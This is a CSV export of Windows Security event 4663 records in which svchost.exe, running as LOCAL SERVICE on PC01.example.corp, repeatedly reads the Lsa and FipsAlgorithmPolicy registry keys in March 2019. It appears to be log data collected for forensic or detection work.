+ + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 